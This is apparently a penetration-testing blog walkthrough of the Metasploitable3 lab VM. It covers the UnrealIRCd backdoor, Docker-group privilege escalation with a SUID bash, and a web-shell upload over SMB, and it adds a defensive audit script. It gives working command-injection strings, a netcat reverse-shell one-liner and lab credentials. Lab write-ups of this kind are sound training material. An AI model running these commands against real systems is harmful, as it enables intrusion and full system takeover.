Penetration Testing

Metasploitable3 Walkthrough: Penetration Testing (Part 2)

By SecureLayer7 Lab



Introduction

In the previous part, we covered network discovery and began exploiting the FTP service and web applications running on port 80. In this part, we will continue by gaining remote code execution and exploring further vulnerabilities.

We start with Nmap scanning, and in this section, we will exploit the UnrealIRCd service and SMB.

Nmap scanning

Unreal IRC Service 6697

With Metasploit

While searching for a public exploit, we found that Metasploit already has a module for this service. The vulnerability dates from November 2009, when the UnrealIRCd source archive on the mirror (Unreal3.2.8.1.tar.gz) was replaced with a malicious version containing a backdoor that allows anyone to execute any command with the privileges of the user running the ircd.

Exploitation is straightforward: we set RHOST, select a payload (cmd/unix/reverse_perl), set the target port to 6697 and LHOST to 10.0.2.15, and we obtain a command execution shell.


Now, we have a command execution shell.

According to the Metasploit module, the exploit connects to the service and sends the string `AB;`, which the backdoor recognises and passes everything that follows it to the system shell. The module therefore sends `AB;` followed by the reverse shell payload.

Let's try it manually by running the command `AB; mkdir /tmp/pwn;`

Terminal output of command injection payload running mkdir /tmp/pwn to create a directory

As we can see, the directory has been successfully created.

Terminal confirming the /tmp/pwn directory was created successfully via injected command

To get a reverse shell, we can use the same trigger with a different command: `AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP_ADDRESS PORT >/tmp/f`


Privilege Escalation

After the reverse shell, we now have a stable shell. The user boba_fett is a member of the docker group, which means it can use Docker without being in the sudo group.

Reverse shell as boba_fett showing membership in the docker group for privilege escalation

Running `docker images` to list the installed images shows that Ubuntu is one of them, which makes the escalation a piece of cake.

docker images output listing the Ubuntu image available for container privilege escalation

Running `docker run -v /:/mnt --rm -it ubuntu chroot /mnt /bin/bash` mounts the host's / at /mnt inside the container and uses `chroot` to obtain full root access to the host filesystem, which lets us write to host files.

As the picture shows, the host files appear as the root directory of the container.

Docker container with host filesystem mounted via chroot, showing host root directory files

Setting the SUID bit on /bin/bash with `chmod u+s /bin/bash` lets it run as root.

Setting the SUID bit on /bin/bash with chmod u+s to run it as root

Running it with the -p option enables privileged mode, which stops bash from dropping the elevated privileges, so we now have an effective user ID (EUID) of root, as shown in the image below:

Running bash -p to gain an effective user ID of root after setting the SUID bit
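As an added defender-side check that is not part of the original walkthrough: a small Python audit that flags the two host conditions this escalation chain depends on, a non-root user in the docker (or lxd) group and a root-owned shell binary carrying the SUID bit. The group file content below is constructed sample input; the `__main__` section runs the same checks against the live host.

```python
"""Audit for the two weaknesses behind the Docker -> SUID bash escalation."""
import os
import stat

# Membership of these groups is root-equivalent on the host: docker lets a user
# mount / into a container (as done above), and lxd offers the same via LXC.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd"}

# Shells that should never carry the SUID bit (bash -p keeps the elevated EUID).
SHELL_BINARIES = ("/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash")

# Constructed /etc/group excerpt mirroring the walkthrough (boba_fett in docker).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:vagrant
docker:x:999:boba_fett
users:x:100:chewbacca,boba_fett
"""


def root_equivalent_members(group_file_text):
    """Parse /etc/group text; return {group: [members]} for risky groups with members."""
    findings = {}
    for line in group_file_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # malformed line, skip rather than crash
        name, members = parts[0], [m for m in parts[3].split(",") if m]
        if name in ROOT_EQUIVALENT_GROUPS and members:
            findings[name] = members
    return findings


def suid_shells(stat_by_path):
    """Given {path: (st_mode, st_uid)}, return root-owned shells with SUID set."""
    return sorted(path for path, (mode, uid) in stat_by_path.items()
                  if mode & stat.S_ISUID and uid == 0)


def collect_shell_stats(paths=SHELL_BINARIES):
    """Read mode and owner of each shell binary that exists on this host."""
    found = {}
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        found[path] = (st.st_mode, st.st_uid)
    return found


if __name__ == "__main__":
    with open("/etc/group") as fh:
        print("root-equivalent group members:", root_equivalent_members(fh.read()))
    print("SUID shells:", suid_shells(collect_shell_stats()))
```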

Samba 445

Under the /uploads/

Samba enumeration on port 445 listing the uploads share contents

The chewbacca user has access to /var/www/html.

To get a reverse shell, we need to edit the IP and port fields of the web shell.

Editing the webshell to set the attacker IP and port for the reverse shell

`smbclient //10.0.2.15/public -U chewbacca%rwaaaawr5` connects to the SMB share, after which we upload the web shell.

smbclient connecting to the public share as chewbacca to upload the webshell

The web shell used here is listed under Resources.

We load the web shell with curl to trigger the reverse shell.

Loading the uploaded web shell with curl to trigger the reverse shell

With a listener on the specified port (in my case, 1234), we receive the reverse shell.

Netcat listener on port 1234 receiving the incoming reverse shell connection

Resources: